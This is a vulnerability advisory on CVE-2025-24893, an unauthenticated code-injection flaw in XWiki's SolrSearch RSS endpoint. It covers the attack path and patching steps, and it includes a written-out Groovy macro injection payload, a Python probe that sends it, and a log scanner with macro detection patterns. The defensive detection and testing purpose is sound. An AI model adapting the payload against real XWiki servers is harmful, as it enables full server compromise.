External risk intelligence

XWiki Platform Remote Code Execution Vulnerability.

CVE advisory / Known Exploit

CVE-2025-24893

A vulnerability in XWiki Platform allows unauthenticated users to execute arbitrary code, impacting data confidentiality, integrity, and availability. The flaw is reachable through the `SolrSearch` endpoint, where attacker-supplied search text is rendered as wiki syntax instead of being treated as plain data, and it requires immediate attention.

Halo Surface Signal: 4

Code Injection

XWiki

Affected versions: 5.4 to before 15.10.11; 16.0.0 to before 16.4.1; 5.3

External exposure likelihood

Halo Surface Signal score for CVE-2025-24893

XWiki is a web-based collaboration platform commonly deployed as an internet-facing or intranet-facing web application. Because a wiki exists to let people collaborate, it is frequently exposed with guest access enabled, which makes web endpoints such as `SolrSearch` reachable by anyone who can reach the site. Since the vulnerability is exploitable by unauthenticated guests, it falls into the category of reachable web-based services.

Horizon Alert

Summary of the vulnerability and why it matters

XWiki Platform, a generic wiki platform, has a vulnerability that allows unauthenticated users to execute arbitrary code. The flaw lies in the `SolrSearch` functionality: the search text supplied by the requester is rendered as wiki syntax in the RSS output, so a guest can inject a script macro such as `{{groovy}}` and have it executed on the server. This can affect the confidentiality, integrity, and availability of the entire XWiki installation.

  • Affected component: the `SolrSearch` page of XWiki Platform (`Main.SolrSearch`), specifically its RSS rendering.
  • Allows unauthenticated remote code execution.
  • Impacts data confidentiality, integrity, and availability.

Attack Path

How an attacker could exploit the issue

An attacker sends a single HTTP GET request to the `SolrSearch` page with `media=rss` and a `text` parameter containing XWiki macro syntax. No authentication is required. Because the search text is rendered rather than escaped, a `{{groovy}}` macro placed in the parameter executes on the server, giving the attacker code execution in the context of the XWiki process and affecting the confidentiality, integrity, and availability of the installation.

  • Exposure condition: the `SolrSearch` endpoint (`/xwiki/bin/get/Main/SolrSearch`) is reachable by the attacker, typically because the wiki is internet-facing or allows guest access.
  • Attacker starting point: unauthenticated guest access; no account or prior foothold is needed.
  • Trigger and result: one crafted request with macro syntax in the `text` parameter leads to remote code execution.

Live Threat

Current exploitation, exposure, and threat context

The XWiki Platform contains a critical vulnerability that allows unauthenticated remote code execution. Attackers can exploit this by sending a specially crafted request to the `SolrSearch` function. Successful exploitation could lead to a complete compromise of the XWiki installation, affecting the confidentiality, integrity, and availability of all data and systems. Organizations are advised to treat this vulnerability with high urgency due to its severe impact and ease of exploitation.

  • Likely attacker skill level: Low
  • Required access or conditions: None (unauthenticated)
  • Business risk or urgency: Critical

Priority actions

Operational Fix

Recommended remediation, mitigation, and detection steps

The organization should take immediate action to address a critical vulnerability in XWiki Platform that allows unauthenticated remote code execution, impacting the confidentiality, integrity, and availability of XWiki installations. Exploitation is a single request to `SolrSearch`. A benign probe exists: an instance is vulnerable if the RSS feed title contains the computed value of an injected expression rather than the literal search text. Mitigation is to upgrade to a patched version or, as a stopgap, to change the `Main.SolrSearchMacros` page so the feed is returned as a raw `application/xml` response instead of being rendered as wiki syntax.

  • Identify all XWiki assets and their versions, prioritising internet-facing instances and those that allow guest access.
  • Reduce exposure (restrict guest access, or block `SolrSearch` requests whose `text` parameter contains `{{` at the reverse proxy) or isolate affected systems until they are patched.
  • Apply the vendor fix, verify with the benign probe, and monitor access logs for `SolrSearch` requests carrying macro syntax.
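As an added detection example (not from the advisory or from the XWiki project), the following Python scans web-server access-log lines for requests to the `SolrSearch` endpoint whose `text` parameter carries XWiki macro syntax, decoding the parameter twice so that double-encoded braces are still caught. The log lines are constructed samples. Flagging the `velocity` and `python` script macros alongside `groovy` is an assumption that XWiki's other server-side script macros deserve the same severity; the page itself only shows `groovy`.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (Combined Log Format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Feb/2025:10:01:02 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22hi%22%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D HTTP/1.1" 200 1423 "-" "curl/8.4.0"
10.0.0.6 - - [20/Feb/2025:10:01:05 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=quarterly+report HTTP/1.1" 200 980 "-" "Mozilla/5.0"
10.0.0.7 - - [20/Feb/2025:10:01:09 +0000] "GET /xwiki/bin/view/Main/WebHome HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.8 - - [20/Feb/2025:10:01:12 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7B%7Bvelocity%7D%7D%24request HTTP/1.1" 200 900 "-" "python-requests/2.31"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# The page only shows {{groovy}}; treating XWiki's other server-side script
# macros the same way is an assumption made in this example.
SCRIPT_MACROS = ("groovy", "python", "velocity")


def decoded_search_text(target):
    """Return the fully decoded `text` parameter of a request target,
    or None if the target is not a SolrSearch request."""
    parts = urlsplit(target)
    if "/Main/SolrSearch" not in parts.path:
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    text = " ".join(params.get("text", []))
    # parse_qs already decoded once; decode again so %257B-style double
    # encoding cannot hide the braces from the check below.
    return unquote(text)


def classify_request(target):
    """Return (severity, reason) for a suspicious SolrSearch request, else None."""
    text = decoded_search_text(target)
    if text is None:
        return None
    lowered = text.lower()
    for macro in SCRIPT_MACROS:
        if "{{" + macro in lowered:
            return ("high", "script macro {{" + macro + "}} in text parameter")
    if "{{" in lowered or "}}" in lowered:
        return ("medium", "wiki macro syntax in text parameter")
    return None


def scan_log(log_text):
    """Scan access-log text; return one finding per suspicious SolrSearch request."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        verdict = classify_request(m.group("target"))
        if verdict is None:
            continue
        findings.append({
            "ip": m.group("ip"),
            "time": m.group("ts"),
            "status": m.group("status"),
            "severity": verdict[0],
            "reason": verdict[1],
            "text": decoded_search_text(m.group("target"))[:80],
        })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['severity']:<6} {f['ip']:<10} {f['reason']}: {f['text']!r}")
```

A 200 status on a flagged request does not by itself prove execution; pair the finding with the benign probe against the same instance, or with evidence from the XWiki process (child processes, outbound connections) for the high-severity hits.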

Frequently asked questions

What is the primary function of XWiki Platform and what type of vulnerability does it contain?

XWiki Platform serves as a generic wiki platform, providing runtime services for applications built upon it. It currently contains a critical vulnerability that allows for arbitrary remote code execution by unauthenticated users. This flaw impacts the confidentiality, integrity, and availability of the entire XWiki installation.

How can the XWiki Platform vulnerability be exploited, and what is the weakness class involved?

The vulnerability in XWiki Platform can be exploited through a single crafted request to the `SolrSearch` functionality. The weakness is classified as CWE-95 (Improper Neutralization of Directives in Dynamically Evaluated Code, 'Eval Injection') and CWE-94 (Improper Control of Generation of Code, 'Code Injection'): untrusted input is interpreted as wiki markup and then evaluated as a Groovy script, enabling arbitrary remote code execution.

What is the trigger path for the XWiki Platform vulnerability, and does it involve scope negation?

The trigger path is a single unauthenticated GET request to `<host>/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20`. URL-decoded, the `text` parameter is `}}}{{async async=false}}{{groovy}}println("Hello from" + " search text:" + (23 + 19)){{/groovy}}{{/async}}`: the leading `}}}` breaks out of the enclosing macro syntax, and the `{{groovy}}` macro then runs inside a synchronous `{{async}}` block. An instance is vulnerable if the RSS feed title contains 'Hello from search text:42'. The string concatenation and the arithmetic are what make the probe reliable: a patched instance only echoes the literal search text, which never contains that string. The vulnerability does not appear to involve explicit scope negation in the trigger itself.
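The probe above, as an added example that is not the page's or XWiki's own code: build the benign request from the advisory and decide from the returned feed whether the expression was evaluated. `https://wiki.example.com` and the two sample feeds are constructed placeholders; `probe()` performs a real request only when you call it and should only be pointed at systems you are authorized to test.

```python
import urllib.request
import xml.etree.ElementTree as ET
from urllib.parse import quote

SOLR_SEARCH_PATH = "/xwiki/bin/get/Main/SolrSearch"

# Benign probe text from the advisory. The concatenation and the arithmetic
# mean the marker can only appear if Groovy actually ran; a patched instance
# merely echoes this literal text back.
PROBE_TEXT = (
    '}}}{{async async=false}}{{groovy}}'
    'println("Hello from" + " search text:" + (23 + 19))'
    '{{/groovy}}{{/async}} '
)
MARKER = "Hello from search text:42"


def build_probe_url(base_url):
    """Assemble the probe URL; base_url is the XWiki origin,
    e.g. https://wiki.example.com (placeholder)."""
    return (base_url.rstrip("/") + SOLR_SEARCH_PATH
            + "?media=rss&text=" + quote(PROBE_TEXT, safe=""))


def feed_titles(rss_body):
    """Return every <title> text in the feed; if the body is not well-formed
    XML, fall back to treating the whole body as one title."""
    try:
        root = ET.fromstring(rss_body)
    except ET.ParseError:
        return [rss_body]
    return [t.text or "" for t in root.iter("title")]


def is_vulnerable(rss_body):
    """True when the evaluated marker, not the literal probe text,
    shows up in a feed title."""
    return any(MARKER in title for title in feed_titles(rss_body))


def probe(base_url, timeout=10):
    """Send the probe to a live instance. Only use against systems you are
    authorized to test."""
    req = urllib.request.Request(
        build_probe_url(base_url),
        headers={"User-Agent": "cve-2025-24893-check"},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return is_vulnerable(resp.read().decode("utf-8", "replace"))


# Constructed sample responses (not captured from a real instance).
VULNERABLE_FEED = """<rss version="2.0"><channel>
<title>Hello from search text:42</title>
<link>https://wiki.example.com/xwiki/bin/view/Main/SolrSearch</link>
<description>Search results</description>
</channel></rss>"""

PATCHED_FEED = """<rss version="2.0"><channel>
<title>Search: }}}{{async async=false}}{{groovy}}println("Hello from" + " search text:" + (23 + 19)){{/groovy}}{{/async}}</title>
<link>https://wiki.example.com/xwiki/bin/view/Main/SolrSearch</link>
<description>Search results</description>
</channel></rss>"""


if __name__ == "__main__":
    print(build_probe_url("https://wiki.example.com"))
    print("sample vulnerable feed:", is_vulnerable(VULNERABLE_FEED))
    print("sample patched feed:", is_vulnerable(PATCHED_FEED))
```

`quote(PROBE_TEXT, safe="")` reproduces the advisory's URL byte for byte, which is useful when comparing your own requests against what appears in access logs.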

What is the relevance of the XWiki Platform vulnerability, considering its 'Likely' exposure signal?

The XWiki Platform vulnerability has a 'Likely' exposure signal because XWiki is a web-based collaboration platform often deployed facing the internet or internal networks, making endpoints like `SolrSearch` accessible to users. The ability for unauthenticated guests to exploit this vulnerability contributes to its significant relevance for organizations using XWiki.

What practical steps should users take to respond to the XWiki Platform vulnerability?

Users should upgrade to a patched version of XWiki Platform: 15.10.11, 16.4.1, or 16.5.0RC1. If an upgrade is not immediately feasible, administrators can apply the manual workaround from the advisory: edit the `Main.SolrSearchMacros` page (line 955 of `SolrSearchMacros.xml`) so that, instead of rendering the feed content as wiki syntax, it returns the raw response in the same way as the `rawResponse` macro in `macros.vm` (line 2824), with a content type of `application/xml`. After either change, re-run the benign probe and confirm that the feed title no longer contains 'Hello from search text:42'.
